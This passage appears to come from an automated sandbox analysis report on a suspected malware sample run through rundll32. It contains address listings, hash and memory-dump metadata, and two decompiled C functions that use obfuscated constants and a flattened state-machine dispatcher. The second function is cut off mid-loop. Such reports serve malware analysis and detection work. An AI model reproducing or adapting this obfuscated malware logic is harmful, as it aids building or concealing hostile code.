                                                                                                                      0x0035343f
                                                                                                                      0x0035343f
                                                                                                                      0x0035343f
                                                                                                                      0x00353447
                                                                                                                      0x0035344a
                                                                                                                      0x00000000
                                                                                                                      0x003533f4
                                                                                                                      0x003533f4
                                                                                                                      0x003533fa
                                                                                                                      0x00000000
                                                                                                                      0x00353400
                                                                                                                      0x00353417
                                                                                                                      0x0035341c
                                                                                                                      0x003533fa
                                                                                                                      0x003533f2
                                                                                                                      0x0035341f
                                                                                                                      0x00353430
                                                                                                                      0x00353430
                                                                                                                      0x0035327e
                                                                                                                      0x003533d2
                                                                                                                      0x003533d7
                                                                                                                      0x00000000
                                                                                                                      0x00353284
                                                                                                                      0x0035328a
                                                                                                                      0x003533b0
                                                                                                                      0x003533b7
                                                                                                                      0x00000000
                                                                                                                      0x00353290
                                                                                                                      0x00353296
                                                                                                                      0x00353369
                                                                                                                      0x0035338f
                                                                                                                      0x00353394
                                                                                                                      0x00353397
                                                                                                                      0x00353273
                                                                                                                      0x00353273
                                                                                                                      0x00353275
                                                                                                                      0x00000000
                                                                                                                      0x00353275
                                                                                                                      0x0035329c
                                                                                                                      0x003532a2
                                                                                                                      0x00353352
                                                                                                                      0x00353354
                                                                                                                      0x00353357
                                                                                                                      0x00353359
                                                                                                                      0x0035335f
                                                                                                                      0x00353273
                                                                                                                      0x00353273
                                                                                                                      0x00353275
                                                                                                                      0x00000000
                                                                                                                      0x00353275
                                                                                                                      0x00353273
                                                                                                                      0x003532a8
                                                                                                                      0x003532ae
                                                                                                                      0x00000000
                                                                                                                      0x003532b4
                                                                                                                      0x00353316
                                                                                                                      0x0035331b
                                                                                                                      0x0035331d
                                                                                                                      0x00353322
                                                                                                                      0x003533da
                                                                                                                      0x003533da
                                                                                                                      0x00353273
                                                                                                                      0x00353273
                                                                                                                      0x00353275
                                                                                                                      0x00000000
                                                                                                                      0x00353275
                                                                                                                      0x00353328
                                                                                                                      0x00353328
                                                                                                                      0x0035332d
                                                                                                                      0x00353273
                                                                                                                      0x00353273
                                                                                                                      0x00353275
                                                                                                                      0x00000000
                                                                                                                      0x00353275
                                                                                                                      0x00353273
                                                                                                                      0x00353322
                                                                                                                      0x003532ae
                                                                                                                      0x003532a2
                                                                                                                      0x00353296
                                                                                                                      0x0035328a
                                                                                                                      0x00000000
                                                                                                                      0x00353501
                                                                                                                      0x00353501
                                                                                                                      0x00353501
                                                                                                                      0x00000000
                                                                                                                      0x0035350d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !kX$gB!$i}$mq$S
                                                                                                                      • API String ID: 0-2280178044
                                                                                                                      • Opcode ID: 7c4191487d42060070a8af234398d83435596a1ba0fcf526e7cc5a6f717ff980
                                                                                                                      • Instruction ID: b2c637229c8de1c86ef38a6b8bc99d656864aaf2abd12e7fc5f25cd1d69126aa
                                                                                                                      • Opcode Fuzzy Hash: 7c4191487d42060070a8af234398d83435596a1ba0fcf526e7cc5a6f717ff980
                                                                                                                      • Instruction Fuzzy Hash: 6E2213725093809FD375CF65C88AA8FBBE1FBC5758F10891DE69A86260D7B18948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E0035B391() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v532;
                                                                                                                      				intOrPtr _v536;
                                                                                                                      				intOrPtr _v540;
                                                                                                                      				intOrPtr _v544;
                                                                                                                      				intOrPtr _v548;
                                                                                                                      				intOrPtr _v552;
                                                                                                                      				intOrPtr _v556;
                                                                                                                      				intOrPtr _v560;
                                                                                                                      				char _v564;
                                                                                                                      				intOrPtr _v568;
                                                                                                                      				char _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _v676;
                                                                                                                      				signed int _v680;
                                                                                                                      				signed int _v684;
                                                                                                                      				signed int _v688;
                                                                                                                      				signed int _v692;
                                                                                                                      				signed int _v696;
                                                                                                                      				signed int _t301;
                                                                                                                      				intOrPtr _t304;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t308;
                                                                                                                      				intOrPtr _t309;
                                                                                                                      				intOrPtr _t311;
                                                                                                                      				void* _t315;
                                                                                                                      				void* _t316;
                                                                                                                      				char _t321;
                                                                                                                      				signed int _t345;
                                                                                                                      				signed int _t346;
                                                                                                                      				signed int _t347;
                                                                                                                      				signed int _t348;
                                                                                                                      				signed int _t349;
                                                                                                                      				void* _t352;
                                                                                                                      
                                                                                                                      				_v688 = 0x901d1c;
                                                                                                                      				_v688 = _v688 >> 1;
                                                                                                                      				_t316 = 0x1066f98;
                                                                                                                      				_v688 = _v688 >> 0xb;
                                                                                                                      				_v688 = _v688 >> 4;
                                                                                                                      				_v688 = _v688 ^ 0x00000091;
                                                                                                                      				_v672 = 0xe40ad3;
                                                                                                                      				_v672 = _v672 + 0xffffd85d;
                                                                                                                      				_v672 = _v672 * 0x13;
                                                                                                                      				_t315 = 0;
                                                                                                                      				_v672 = _v672 + 0xffff2a54;
                                                                                                                      				_v672 = _v672 ^ 0x10e907e4;
                                                                                                                      				_v592 = 0x3017ed;
                                                                                                                      				_t345 = 7;
                                                                                                                      				_v592 = _v592 * 0x4e;
                                                                                                                      				_v592 = _v592 ^ 0x0ea74a35;
                                                                                                                      				_v660 = 0x55ed7f;
                                                                                                                      				_v660 = _v660 << 0xa;
                                                                                                                      				_v660 = _v660 ^ 0xe1a17f4c;
                                                                                                                      				_v660 = _v660 ^ 0xb614834c;
                                                                                                                      				_v608 = 0x9a742a;
                                                                                                                      				_v608 = _v608 / _t345;
                                                                                                                      				_v608 = _v608 ^ 0x00111f40;
                                                                                                                      				_v620 = 0xa60b0f;
                                                                                                                      				_v620 = _v620 | 0xf97ffff7;
                                                                                                                      				_v620 = _v620 ^ 0xf9fd807b;
                                                                                                                      				_v648 = 0xfa23dc;
                                                                                                                      				_v648 = _v648 + 0xc8b0;
                                                                                                                      				_v648 = _v648 ^ 0x1c787af5;
                                                                                                                      				_v648 = _v648 ^ 0x1c8a9b8c;
                                                                                                                      				_v644 = 0x871147;
                                                                                                                      				_v644 = _v644 ^ 0x5acff931;
                                                                                                                      				_t346 = 0x17;
                                                                                                                      				_v644 = _v644 / _t346;
                                                                                                                      				_v644 = _v644 ^ 0x03ea575c;
                                                                                                                      				_v676 = 0x868c3;
                                                                                                                      				_v676 = _v676 | 0x99683da5;
                                                                                                                      				_v676 = _v676 ^ 0x7cfc9963;
                                                                                                                      				_v676 = _v676 * 0x60;
                                                                                                                      				_v676 = _v676 ^ 0x17da9425;
                                                                                                                      				_v692 = 0x1af18a;
                                                                                                                      				_v692 = _v692 >> 5;
                                                                                                                      				_v692 = _v692 >> 9;
                                                                                                                      				_v692 = _v692 | 0x73f4147c;
                                                                                                                      				_v692 = _v692 ^ 0x73f59be7;
                                                                                                                      				_v588 = 0xc5bea0;
                                                                                                                      				_v588 = _v588 >> 1;
                                                                                                                      				_v588 = _v588 ^ 0x00674961;
                                                                                                                      				_v640 = 0x2d0675;
                                                                                                                      				_v640 = _v640 << 0x10;
                                                                                                                      				_v640 = _v640 * 0x13;
                                                                                                                      				_v640 = _v640 ^ 0x7aa9e3bb;
                                                                                                                      				_v684 = 0x479e10;
                                                                                                                      				_v684 = _v684 >> 4;
                                                                                                                      				_v684 = _v684 >> 4;
                                                                                                                      				_v684 = _v684 + 0xffff346b;
                                                                                                                      				_v684 = _v684 ^ 0xfffe4734;
                                                                                                                      				_v632 = 0xc30056;
                                                                                                                      				_v632 = _v632 * 0x5c;
                                                                                                                      				_v632 = _v632 * 0x6f;
                                                                                                                      				_v632 = _v632 ^ 0x62b5b133;
                                                                                                                      				_v652 = 0xa7e056;
                                                                                                                      				_v652 = _v652 + 0xffffad3c;
                                                                                                                      				_v652 = _v652 + 0x159e;
                                                                                                                      				_v652 = _v652 ^ 0x00a9a717;
                                                                                                                      				_v656 = 0x7de4be;
                                                                                                                      				_v656 = _v656 ^ 0xe25ca0e3;
                                                                                                                      				_v656 = _v656 + 0xfffff925;
                                                                                                                      				_v656 = _v656 ^ 0xe22d648b;
                                                                                                                      				_v624 = 0x8a5e75;
                                                                                                                      				_v624 = _v624 << 1;
                                                                                                                      				_v624 = _v624 ^ 0x6ebaa440;
                                                                                                                      				_v624 = _v624 ^ 0x6faa9c0f;
                                                                                                                      				_v612 = 0xc07e93;
                                                                                                                      				_v612 = _v612 >> 0xe;
                                                                                                                      				_v612 = _v612 ^ 0x000a477b;
                                                                                                                      				_v680 = 0x9e34fb;
                                                                                                                      				_v680 = _v680 ^ 0x08ee2ed2;
                                                                                                                      				_v680 = _v680 | 0xddc8b22d;
                                                                                                                      				_v680 = _v680 + 0xffff580d;
                                                                                                                      				_v680 = _v680 ^ 0xddf50a5e;
                                                                                                                      				_v580 = 0xd0aa6a;
                                                                                                                      				_t347 = 0x7f;
                                                                                                                      				_v580 = _v580 / _t347;
                                                                                                                      				_v580 = _v580 ^ 0x000dde97;
                                                                                                                      				_v576 = 0xcc5a;
                                                                                                                      				_v576 = _v576 + 0xffff83d9;
                                                                                                                      				_v576 = _v576 ^ 0x0009e5e2;
                                                                                                                      				_v600 = 0x582413;
                                                                                                                      				_v600 = _v600 << 9;
                                                                                                                      				_v600 = _v600 ^ 0xb0446c4a;
                                                                                                                      				_v628 = 0x333e17;
                                                                                                                      				_v628 = _v628 + 0x2781;
                                                                                                                      				_v628 = _v628 << 2;
                                                                                                                      				_v628 = _v628 ^ 0x00cb68d0;
                                                                                                                      				_v636 = 0xefc605;
                                                                                                                      				_v636 = _v636 + 0xf21d;
                                                                                                                      				_v636 = _v636 ^ 0xa2cf77f2;
                                                                                                                      				_v636 = _v636 ^ 0xa23a4adf;
                                                                                                                      				_v584 = 0xc861d6;
                                                                                                                      				_v584 = _v584 + 0xfffffbc1;
                                                                                                                      				_v584 = _v584 ^ 0x00c0ae4c;
                                                                                                                      				_v696 = 0x7445bb;
                                                                                                                      				_v696 = _v696 >> 4;
                                                                                                                      				_v696 = _v696 >> 4;
                                                                                                                      				_t348 = 0x3d;
                                                                                                                      				_v696 = _v696 / _t348;
                                                                                                                      				_v696 = _v696 ^ 0x0009867a;
                                                                                                                      				_v668 = 0xeed7a6;
                                                                                                                      				_v668 = _v668 + 0xffff818b;
                                                                                                                      				_v668 = _v668 + 0xffff94c8;
                                                                                                                      				_v668 = _v668 | 0xd4d5cc38;
                                                                                                                      				_v668 = _v668 ^ 0xd4f8ebbd;
                                                                                                                      				_v616 = 0xaa402c;
                                                                                                                      				_v616 = _v616 | 0x0a4de871;
                                                                                                                      				_v616 = _v616 ^ 0x0aee0038;
                                                                                                                      				_v596 = 0xe91624;
                                                                                                                      				_v596 = _v596 << 5;
                                                                                                                      				_v596 = _v596 ^ 0x1d2db722;
                                                                                                                      				_v664 = 0xe73f23;
                                                                                                                      				_v664 = _v664 + 0xffff972a;
                                                                                                                      				_v664 = _v664 | 0x942ef86c;
                                                                                                                      				_v664 = _v664 ^ 0xa565e6c8;
                                                                                                                      				_v664 = _v664 ^ 0x31893120;
                                                                                                                      				_v604 = 0xdd76c6;
                                                                                                                      				_t349 = 0x2b;
                                                                                                                      				_t344 = _v616;
                                                                                                                      				_v604 = _v604 / _t349;
                                                                                                                      				_v604 = _v604 ^ 0x0000a605;
                                                                                                                      				do {
                                                                                                                      					while(_t316 != 0xb706b9) {
                                                                                                                      						if(_t316 == 0x1066f98) {
                                                                                                                      							_t316 = 0x2a9290b;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t316 == 0x2a9290b) {
                                                                                                                      								E0035BBB2(_v608, _v620,  &_v572);
                                                                                                                      								_t316 = 0xb706b9;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t316 == 0x5ceff6a) {
                                                                                                                      									_t301 = E0035E938(0, _v672, _v680, _v580, _v592, _t316, _v576, _v600, _t316, _v628, _v688,  &_v524);
                                                                                                                      									_t344 = _t301;
                                                                                                                      									_t352 = _t352 + 0x28;
                                                                                                                      									__eflags = _t301 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t316 = 0xefecb64;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t316 == 0xe98dd96) {
                                                                                                                      										E00354DAD(_v616, _v596, _t344, _v664, _v604);
                                                                                                                      									} else {
                                                                                                                      										if(_t316 == 0xefecb64) {
                                                                                                                      											_t304 = _v568;
                                                                                                                      											_t321 = _v572;
                                                                                                                      											_v560 = _t304;
                                                                                                                      											_v552 = _t304;
                                                                                                                      											_v544 = _t304;
                                                                                                                      											_v536 = _t304;
                                                                                                                      											_v532 = _v660;
                                                                                                                      											_v564 = _t321;
                                                                                                                      											_v556 = _t321;
                                                                                                                      											_v548 = _t321;
                                                                                                                      											_v540 = _t321;
                                                                                                                      											_t307 = E00345D65(_t321, _t344, _v636, _t321,  &_v564, _v584, _v696, _v668);
                                                                                                                      											_t352 = _t352 + 0x18;
                                                                                                                      											__eflags = _t307;
                                                                                                                      											_t315 =  !=  ? 1 : _t315;
                                                                                                                      											_t316 = 0xe98dd96;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											_t362 = _t316 - 0xf7fe787;
                                                                                                                      											if(_t316 != 0xf7fe787) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												_push(_v692);
                                                                                                                      												_push(_v676);
                                                                                                                      												_push(0x3410cc);
                                                                                                                      												_t308 = E0034AB66(_v648, _v644, _t362);
                                                                                                                      												_t309 =  *0x36520c; // 0x0
                                                                                                                      												_t311 =  *0x36520c; // 0x0
                                                                                                                      												E0034E7CE(_t308, _t362, _v588, _t311 + 8, _v648, _v640, _v684, _v632, _v652, _t309 + 0x220);
                                                                                                                      												E0034AE03(_v656, _v624, _v612, _t308);
                                                                                                                      												_t352 = _t352 + 0x34;
                                                                                                                      												_t316 = 0x5ceff6a;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t315;
                                                                                                                      					}
                                                                                                                      					_v572 = _v572 - E00349A1E();
                                                                                                                      					_t316 = 0xf7fe787;
                                                                                                                      					asm("sbb [esp+0x94], edx");
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t316 - 0x36ffdb;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L18;
                                                                                                                      			}
                                                                                                                      0x0035b536
                                                                                                                      0x0035b53b
                                                                                                                      0x0035b543
                                                                                                                      0x0035b54b
                                                                                                                      0x0035b558
                                                                                                                      0x0035b561
                                                                                                                      0x0035b565
                                                                                                                      0x0035b56d
                                                                                                                      0x0035b575
                                                                                                                      0x0035b57d
                                                                                                                      0x0035b587
                                                                                                                      0x0035b594
                                                                                                                      0x0035b59c
                                                                                                                      0x0035b5a4
                                                                                                                      0x0035b5ac
                                                                                                                      0x0035b5b4
                                                                                                                      0x0035b5bc
                                                                                                                      0x0035b5c0
                                                                                                                      0x0035b5c8
                                                                                                                      0x0035b5d0
                                                                                                                      0x0035b5d8
                                                                                                                      0x0035b5dd
                                                                                                                      0x0035b5e5
                                                                                                                      0x0035b5ed
                                                                                                                      0x0035b5f5
                                                                                                                      0x0035b5fd
                                                                                                                      0x0035b605
                                                                                                                      0x0035b60d
                                                                                                                      0x0035b621
                                                                                                                      0x0035b626
                                                                                                                      0x0035b62f
                                                                                                                      0x0035b63a
                                                                                                                      0x0035b645
                                                                                                                      0x0035b650
                                                                                                                      0x0035b65b
                                                                                                                      0x0035b663
                                                                                                                      0x0035b668
                                                                                                                      0x0035b670
                                                                                                                      0x0035b678
                                                                                                                      0x0035b680
                                                                                                                      0x0035b685
                                                                                                                      0x0035b68d
                                                                                                                      0x0035b695
                                                                                                                      0x0035b69d
                                                                                                                      0x0035b6a5
                                                                                                                      0x0035b6ad
                                                                                                                      0x0035b6b8
                                                                                                                      0x0035b6c3
                                                                                                                      0x0035b6ce
                                                                                                                      0x0035b6d6
                                                                                                                      0x0035b6db
                                                                                                                      0x0035b6e4
                                                                                                                      0x0035b6e9
                                                                                                                      0x0035b6ef
                                                                                                                      0x0035b6f7
                                                                                                                      0x0035b6ff
                                                                                                                      0x0035b707
                                                                                                                      0x0035b70f
                                                                                                                      0x0035b717
                                                                                                                      0x0035b71f
                                                                                                                      0x0035b727
                                                                                                                      0x0035b72f
                                                                                                                      0x0035b737
                                                                                                                      0x0035b73f
                                                                                                                      0x0035b744
                                                                                                                      0x0035b74c
                                                                                                                      0x0035b754
                                                                                                                      0x0035b75c
                                                                                                                      0x0035b764
                                                                                                                      0x0035b76c
                                                                                                                      0x0035b774
                                                                                                                      0x0035b780
                                                                                                                      0x0035b783
                                                                                                                      0x0035b787
                                                                                                                      0x0035b78b
                                                                                                                      0x0035b793
                                                                                                                      0x0035b793
                                                                                                                      0x0035b7a5
                                                                                                                      0x0035b95b
                                                                                                                      0x00000000
                                                                                                                      0x0035b7ab
                                                                                                                      0x0035b7ad
                                                                                                                      0x0035b94b
                                                                                                                      0x0035b951
                                                                                                                      0x00000000
                                                                                                                      0x0035b7b3
                                                                                                                      0x0035b7b9
                                                                                                                      0x0035b922
                                                                                                                      0x0035b927
                                                                                                                      0x0035b929
                                                                                                                      0x0035b92c
                                                                                                                      0x0035b92f
                                                                                                                      0x0035b931
                                                                                                                      0x00000000
                                                                                                                      0x0035b931
                                                                                                                      0x0035b7bf
                                                                                                                      0x0035b7c5
                                                                                                                      0x0035b99c
                                                                                                                      0x0035b7cb
                                                                                                                      0x0035b7d1
                                                                                                                      0x0035b861
                                                                                                                      0x0035b86a
                                                                                                                      0x0035b871
                                                                                                                      0x0035b878
                                                                                                                      0x0035b87f
                                                                                                                      0x0035b886
                                                                                                                      0x0035b895
                                                                                                                      0x0035b8a7
                                                                                                                      0x0035b8b5
                                                                                                                      0x0035b8c2
                                                                                                                      0x0035b8c9
                                                                                                                      0x0035b8d0
                                                                                                                      0x0035b8d7
                                                                                                                      0x0035b8db
                                                                                                                      0x0035b8dd
                                                                                                                      0x0035b8e0
                                                                                                                      0x00000000
                                                                                                                      0x0035b7d7
                                                                                                                      0x0035b7d7
                                                                                                                      0x0035b7dd
                                                                                                                      0x00000000
                                                                                                                      0x0035b7e3
                                                                                                                      0x0035b7e3
                                                                                                                      0x0035b7e7
                                                                                                                      0x0035b7f3
                                                                                                                      0x0035b7f8
                                                                                                                      0x0035b802
                                                                                                                      0x0035b81f
                                                                                                                      0x0035b837
                                                                                                                      0x0035b84f
                                                                                                                      0x0035b854
                                                                                                                      0x0035b857
                                                                                                                      0x00000000
                                                                                                                      0x0035b857
                                                                                                                      0x0035b7dd
                                                                                                                      0x0035b7d1
                                                                                                                      0x0035b7c5
                                                                                                                      0x0035b7b9
                                                                                                                      0x0035b7ad
                                                                                                                      0x0035b9a7
                                                                                                                      0x0035b9b0
                                                                                                                      0x0035b9b0
                                                                                                                      0x0035b967
                                                                                                                      0x0035b96e
                                                                                                                      0x0035b973
                                                                                                                      0x0035b97a
                                                                                                                      0x0035b97a
                                                                                                                      0x0035b97a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #?$8$V$aIg$qM
                                                                                                                      • API String ID: 0-1946175224
                                                                                                                      • Opcode ID: f7f5139b07b5e6a3583f21572b60be1714bd0a0bfc8c78602d4ddd1a77782fa5
                                                                                                                      • Instruction ID: 4468493bcbeab28ce6c6b7310c7851af456f56d5cd09d1798f5335d287f3a152
                                                                                                                      • Opcode Fuzzy Hash: f7f5139b07b5e6a3583f21572b60be1714bd0a0bfc8c78602d4ddd1a77782fa5
                                                                                                                      • Instruction Fuzzy Hash: 54E11D714083809FD369CF65C48AA5BFBF1FBC4758F20891DE6AA86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00360867(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				intOrPtr* _t266;
                                                                                                                      				intOrPtr _t273;
                                                                                                                      				intOrPtr _t274;
                                                                                                                      				intOrPtr _t275;
                                                                                                                      				intOrPtr _t281;
                                                                                                                      				intOrPtr _t282;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int _t313;
                                                                                                                      				intOrPtr _t314;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t317;
                                                                                                                      				intOrPtr _t318;
                                                                                                                      				intOrPtr _t319;
                                                                                                                      				signed int* _t320;
                                                                                                                      
                                                                                                                      				_t275 = __ecx;
                                                                                                                      				_t320 =  &_v116;
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_v28 = __ecx;
                                                                                                                      				_v8 = 0x8dec59;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v84 = 0xe165d;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 + 0xc1b7;
                                                                                                                      				_v84 = _v84 ^ 0xc80f2461;
                                                                                                                      				_v84 = _v84 ^ 0xcf04d456;
                                                                                                                      				_v32 = 0x655f30;
                                                                                                                      				_v32 = _v32 + 0x312d;
                                                                                                                      				_v32 = _v32 ^ 0x0065b82f;
                                                                                                                      				_v56 = 0xcafed0;
                                                                                                                      				_v24 = 0;
                                                                                                                      				_t316 = 0x75256fb;
                                                                                                                      				_t307 = 0x74;
                                                                                                                      				_v56 = _v56 / _t307;
                                                                                                                      				_v56 = _v56 | 0x8b781090;
                                                                                                                      				_v56 = _v56 ^ 0x8b7ff779;
                                                                                                                      				_v96 = 0xabe325;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 ^ 0xcbcb3531;
                                                                                                                      				_v96 = _v96 | 0x09a083b5;
                                                                                                                      				_v96 = _v96 ^ 0xbfa5786a;
                                                                                                                      				_v76 = 0x7b9c0a;
                                                                                                                      				_t308 = 0x1c;
                                                                                                                      				_v76 = _v76 / _t308;
                                                                                                                      				_v76 = _v76 + 0xffff76d9;
                                                                                                                      				_v76 = _v76 ^ 0x00066890;
                                                                                                                      				_v80 = 0xfad268;
                                                                                                                      				_v80 = _v80 << 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x68dc041b;
                                                                                                                      				_v80 = _v80 ^ 0xbab50c4e;
                                                                                                                      				_v112 = 0x5717c0;
                                                                                                                      				_v112 = _v112 + 0xd318;
                                                                                                                      				_v112 = _v112 + 0xffff9813;
                                                                                                                      				_v112 = _v112 ^ 0x80b72014;
                                                                                                                      				_v112 = _v112 ^ 0x80e33bd1;
                                                                                                                      				_v116 = 0x9f285d;
                                                                                                                      				_v116 = _v116 >> 9;
                                                                                                                      				_v116 = _v116 + 0xffff6359;
                                                                                                                      				_v116 = _v116 + 0x4b40;
                                                                                                                      				_v116 = _v116 ^ 0xfffb57cb;
                                                                                                                      				_v104 = 0x80a8a2;
                                                                                                                      				_t309 = 0x29;
                                                                                                                      				_v104 = _v104 * 0x2c;
                                                                                                                      				_v104 = _v104 | 0xf3fc02bd;
                                                                                                                      				_v104 = _v104 * 0x46;
                                                                                                                      				_v104 = _v104 ^ 0xcf237eb9;
                                                                                                                      				_v72 = 0x5bfbbd;
                                                                                                                      				_v72 = _v72 | 0xd3d7b19d;
                                                                                                                      				_v72 = _v72 << 0xe;
                                                                                                                      				_v72 = _v72 ^ 0xfee9d95e;
                                                                                                                      				_v108 = 0xd9b2ce;
                                                                                                                      				_v108 = _v108 << 0xf;
                                                                                                                      				_v108 = _v108 + 0xffff979e;
                                                                                                                      				_v108 = _v108 << 2;
                                                                                                                      				_v108 = _v108 ^ 0x6594627e;
                                                                                                                      				_v40 = 0xeed128;
                                                                                                                      				_v40 = _v40 * 0x34;
                                                                                                                      				_v40 = _v40 ^ 0x3088f647;
                                                                                                                      				_v68 = 0x4ae85e;
                                                                                                                      				_v68 = _v68 / _t309;
                                                                                                                      				_t310 = 0x35;
                                                                                                                      				_t319 = _v12;
                                                                                                                      				_v68 = _v68 * 0x53;
                                                                                                                      				_v68 = _v68 ^ 0x009a12ab;
                                                                                                                      				_v60 = 0xe58ccf;
                                                                                                                      				_v60 = _v60 / _t310;
                                                                                                                      				_v60 = _v60 >> 9;
                                                                                                                      				_v60 = _v60 ^ 0x00082ee6;
                                                                                                                      				_v100 = 0x896781;
                                                                                                                      				_v100 = _v100 ^ 0xb532ffdf;
                                                                                                                      				_t311 = 0x3d;
                                                                                                                      				_v100 = _v100 / _t311;
                                                                                                                      				_v100 = _v100 >> 0x10;
                                                                                                                      				_v100 = _v100 ^ 0x0003daf8;
                                                                                                                      				_v64 = 0xd8c0ce;
                                                                                                                      				_v64 = _v64 + 0xffffaca0;
                                                                                                                      				_v64 = _v64 << 0xc;
                                                                                                                      				_v64 = _v64 ^ 0x86dd78e3;
                                                                                                                      				_v36 = 0xf932ba;
                                                                                                                      				_t312 = 0x7f;
                                                                                                                      				_v36 = _v36 * 0x58;
                                                                                                                      				_v36 = _v36 ^ 0x55a76b7b;
                                                                                                                      				_v88 = 0x9f6659;
                                                                                                                      				_v88 = _v88 / _t312;
                                                                                                                      				_v88 = _v88 | 0x1ff6fbbf;
                                                                                                                      				_v88 = _v88 ^ 0xc9c88694;
                                                                                                                      				_v88 = _v88 ^ 0xd6316d06;
                                                                                                                      				_v48 = 0x252418;
                                                                                                                      				_v48 = _v48 ^ 0x008304c1;
                                                                                                                      				_v48 = _v48 + 0xffff4e21;
                                                                                                                      				_v48 = _v48 ^ 0x00a4a0c7;
                                                                                                                      				_v92 = 0xdb5076;
                                                                                                                      				_v92 = _v92 + 0xffff1b85;
                                                                                                                      				_v92 = _v92 | 0x2d9bcef8;
                                                                                                                      				_t313 = 0x68;
                                                                                                                      				_v92 = _v92 / _t313;
                                                                                                                      				_v92 = _v92 ^ 0x0076c4f2;
                                                                                                                      				_v52 = 0x242151;
                                                                                                                      				_v52 = _v52 | 0x94ee4ace;
                                                                                                                      				_v52 = _v52 + 0xf8ef;
                                                                                                                      				_v52 = _v52 ^ 0x94e81f3d;
                                                                                                                      				_t314 = _v4;
                                                                                                                      				_t274 = _v8;
                                                                                                                      				L1:
                                                                                                                      				while(1) {
                                                                                                                      					do {
                                                                                                                      						while(_t316 != 0x1075595) {
                                                                                                                      							if(_t316 == 0x75256fb) {
                                                                                                                      								_t316 = 0x1075595;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t316 != 0xe0f16ec) {
